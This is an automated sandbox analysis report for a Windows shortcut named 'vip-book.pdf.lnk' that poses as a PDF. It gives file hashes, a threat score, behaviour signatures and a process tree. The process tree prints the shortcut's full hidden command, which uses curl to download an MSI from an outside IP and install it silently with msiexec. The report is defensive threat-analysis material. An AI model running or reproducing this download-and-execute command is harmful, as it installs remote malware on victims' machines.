Overview

overview

10

Static

static

1

vip-book.pdf.lnk

windows7-x64

3

vip-book.pdf.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2023, 09:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vip-book.pdf.lnk

  • Size

    1KB

  • MD5

    2684b795956953dd9dc655520799752a

  • SHA1

    0d5c33dc4bd5bac37ecbd5b7c99135242328317c

  • SHA256

    e224b77fedf4ccdfde9711bee8fada7571612ee4cf5121515ead913da5755b5e

  • SHA512

    5bd3a8f4eb5776713ecbe8f47233cd93bb8cd972603e44cded8732acd8a0003ab792cb1e5bc778559caeaed5bd145083a1655ffec41140d96b7868727933d390

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\vip-book.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo juK & echo SHl & echo cG & echo jX & curl -o C:\Users\Admin\AppData\Local\Temp\hhlojhlc.msi http://107.181.161.200:443/msihhlojhlc & msiexec /i C:\Users\Admin\AppData\Local\Temp\hhlojhlc.msi /quiet /qn
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2260
      • C:\Windows\system32\msiexec.exe
        msiexec /i C:\Users\Admin\AppData\Local\Temp\hhlojhlc.msi /quiet /qn
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:2124
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads